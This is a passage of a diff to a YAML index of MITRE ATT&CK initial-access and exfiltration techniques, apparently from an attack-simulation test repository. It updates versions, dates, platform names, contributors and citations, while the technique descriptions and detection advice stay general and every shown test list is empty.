@@ -60860,6 +61782,7 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -60868,18 +61791,18 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -60911,14 +61834,11 @@ initial-access:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1199:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:08:39.968Z'
       name: Trusted Relationship
       description: |-
         Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -60929,6 +61849,11 @@ initial-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_contributors:
+      - Praetorian
+      - ExtraHop
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: Establish monitoring for activity conducted by second and
         third party providers and other trusted entities that may be leveraged as
         a means to gain access to the network. Depending on the type of relationship,
@@ -60937,22 +61862,18 @@ initial-access:
         is based on IT services. Adversaries may be able to act quickly towards an
         objective, so proper monitoring for behavior related to Credential Access,
         Lateral Movement, and Collection will be important to detect the intrusion.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Office 365
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '2.3'
-      x_mitre_contributors:
-      - Praetorian
-      - ExtraHop
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Logon Session: Logon Session Metadata'
@@ -60977,36 +61898,19 @@ initial-access:
         url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566:
     technique:
-      modified: '2024-03-01T16:56:32.245Z'
+      modified: '2024-10-07T15:00:19.668Z'
       name: Phishing
-      description: "Adversaries may send phishing messages to gain access to victim
-        systems. All forms of phishing are electronically delivered social engineering.
-        Phishing can be targeted, known as spearphishing. In spearphishing, a specific
-        individual, company, or industry will be targeted by the adversary. More generally,
-        adversaries can conduct non-targeted phishing, such as in mass malware spam
-        campaigns.\n\nAdversaries may send victims emails containing malicious attachments
-        or links, typically to execute malicious code on victim systems. Phishing
-        may also be conducted via third-party services, like social media platforms.
-        Phishing may also involve social engineering techniques, such as posing as
-        a trusted source, as well as evasive techniques such as removing or manipulating
-        emails or metadata/headers from compromised accounts being abused to send
-        messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
-        Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
-        Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
-        the identity of the sender which can be used to fool both the human recipient
-        as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
-        may also receive phishing messages that instruct them to call a phone number
-        where they are directed to visit a malicious URL, download malware,(Citation:
-        sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
-        or install adversary-accessible remote management tools onto their computer
-        (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
-        Unit42 Luna Moth)"
+      description: |-
+        Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+        Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+        Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
@@ -61035,9 +61939,9 @@ initial-access:
       - macOS
       - Windows
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Flow'
@@ -61055,7 +61959,11 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: phishing-krebs
+        description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+          Prey on Your Curiosity. Retrieved September 27, 2024.'
+        url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
       - source_name: CISA Remote Monitoring and Management Software
         description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
           and Management Software. Retrieved February 2, 2023.
@@ -61093,11 +62001,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -61114,7 +62021,6 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -61124,7 +62030,7 @@ initial-access:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -61133,19 +62039,17 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -61193,11 +62097,12 @@ initial-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1566.004:
     technique:
-      modified: '2023-10-15T11:49:40.990Z'
+      modified: '2024-10-15T16:06:47.134Z'
       name: Spearphishing Voice
       description: |-
         Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -61217,10 +62122,8 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -61253,7 +62156,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1195.002:
     technique:
@@ -61292,7 +62194,7 @@ initial-access:
         may be specific to a desired victim set or may be distributed to a broad set
         of consumers but only move on to additional tactics on specific victims.(Citation:
         Avast CCleaner3 2018)(Citation: Command Five SK 2011)  "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:04:36.636Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Software Supply Chain
       x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -61307,7 +62209,6 @@ initial-access:
       - 'File: File Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -61387,11 +62288,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1200:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.332Z'
       name: Hardware Additions
       description: |-
         Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -61447,11 +62347,10 @@ initial-access:
         url: https://www.youtube.com/watch?v=fXthwl6ShOg
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1189:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:55:47.494Z'
       name: Drive-by Compromise
       description: "Adversaries may gain access to a system through a user visiting
         a website over the normal course of browsing. With this technique, the user's
@@ -61512,8 +62411,8 @@ initial-access:
       - Windows
       - Linux
       - macOS
-      - SaaS
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
@@ -61541,13 +62440,12 @@ initial-access:
         url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -61587,8 +62485,10 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -61596,13 +62496,13 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -61633,14 +62533,11 @@ initial-access:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1566.003:
     technique:
-      modified: '2024-01-31T14:15:55.690Z'
+      modified: '2024-10-15T15:16:30.272Z'
       name: Spearphishing via Service
       description: "Adversaries may send spearphishing messages via third-party services
         in an attempt to gain access to victim systems. Spearphishing via service
@@ -61707,11 +62604,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -61763,15 +62659,14 @@ initial-access:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
 exfiltration:
   T1567:
     technique:
-      modified: '2023-09-05T15:00:36.471Z'
+      modified: '2024-10-15T15:57:40.951Z'
       name: Exfiltration Over Web Service
       description: |-
         Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -61795,10 +62690,9 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
@@ -61817,13 +62711,12 @@ exfiltration:
         external_id: T1567
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.004:
     technique:
-      modified: '2023-10-12T05:22:59.079Z'
+      modified: '2024-10-15T15:57:55.928Z'
       name: Exfiltration Over Webhook
       description: "Adversaries may exfiltrate data to a webhook endpoint rather than
         over their primary command and control channel. Webhooks are simple mechanisms
@@ -61862,9 +62755,8 @@ exfiltration:
       - macOS
       - Linux
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
@@ -61914,7 +62806,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1029:
     technique:
@@ -61934,7 +62825,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1029
         external_id: T1029
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:26:48.769Z'
       name: Scheduled Transfer
       description: |-
         Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -61954,8 +62845,6 @@ exfiltration:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1011:
     technique:
@@ -62002,7 +62891,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1011.001:
     technique:
@@ -62022,7 +62910,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1011.001
         url: https://attack.mitre.org/techniques/T1011/001
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:02:15.802Z'
       name: Exfiltration Over Bluetooth
       description: |-
         Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -62044,8 +62932,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020:
     technique:
@@ -62099,7 +62985,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1020
     atomic_tests: []
   T1048.001:
@@ -62124,7 +63009,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:43:24.228Z'
       name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over a symmetrically
         encrypted network protocol other than that of the existing command and control
@@ -62159,12 +63044,10 @@ exfiltration:
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020.001:
     technique:
-      modified: '2023-04-14T23:23:30.327Z'
+      modified: '2024-10-15T16:08:13.273Z'
       name: Traffic Duplication
       description: |-
         Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -62189,11 +63072,10 @@ exfiltration:
       x_mitre_platforms:
       - Network
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
       created: '2020-10-19T13:40:11.118Z'
@@ -62236,9 +63118,8 @@ exfiltration:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.001:
     technique:
@@ -62285,7 +63166,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1048.002:
     technique:
@@ -62311,7 +63191,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:44:11.953Z'
       name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
         Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -62344,13 +63224,11 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1048.002
     atomic_tests: []
   T1041:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:09:14.040Z'
       name: Exfiltration Over C2 Channel
       description: Adversaries may steal data by exfiltrating it over an existing
         command and control channel. Stolen data is encoded into the normal communications
@@ -62399,12 +63277,11 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1041
     atomic_tests: []
   T1048:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:57:26.415Z'
       name: Exfiltration Over Alternative Protocol
       description: "Adversaries may steal data by exfiltrating it over a different
         protocol than that of the existing command and control channel. The data may
@@ -62440,12 +63317,11 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Network
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Access'
       - 'Network Traffic: Network Traffic Flow'
@@ -62454,7 +63330,6 @@ exfiltration:
       - 'Application Log: Application Log Content'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
       created: '2017-05-31T21:30:44.720Z'
@@ -62478,9 +63353,8 @@ exfiltration:
         url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048
     atomic_tests: []
   T1052.001:
@@ -62503,7 +63377,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1052.001
         url: https://attack.mitre.org/techniques/T1052/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.490Z'
       name: Exfiltration over USB
       description: Adversaries may attempt to exfiltrate data over a USB connected
         physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -62525,8 +63399,6 @@ exfiltration:
       - 'Command: Command Execution'
       x_mitre_system_requirements:
       - Presence of physical medium or device
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1567.003:
     technique:
@@ -62577,7 +63449,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.003
     atomic_tests: []
   T1567.002:
@@ -62627,7 +63498,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.002
     atomic_tests: []
   T1030:
@@ -62652,7 +63522,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:47:46.912Z'
       name: Data Transfer Size Limits
       description: An adversary may exfiltrate data in fixed size chunks instead of
         whole files or limit packet sizes below certain thresholds. This approach
@@ -62675,13 +63545,11 @@ exfiltration:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1030
     atomic_tests: []
   T1537:
     technique:
-      modified: '2024-04-11T15:53:00.577Z'
+      modified: '2024-10-15T16:08:25.344Z'
       name: Transfer Data to Cloud Account
       description: "Adversaries may exfiltrate data by transferring the data, including
         through sharing/syncing and creating backups of cloud environments, to another
@@ -62722,9 +63590,8 @@ exfiltration:
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Modification'
       - 'Snapshot: Snapshot Creation'
@@ -62772,7 +63639,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1052:
     technique:
@@ -62794,7 +63660,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1052
         external_id: T1052
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.702Z'
       name: Exfiltration Over Physical Medium
       description: Adversaries may attempt to exfiltrate data via a physical medium,
         such as a removable drive. In certain circumstances, such as an air-gapped
@@ -62818,12 +63684,10 @@ exfiltration:
       x_mitre_system_requirements:
       - Presence of physical medium or device
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1048.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:39:25.476Z'
       name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
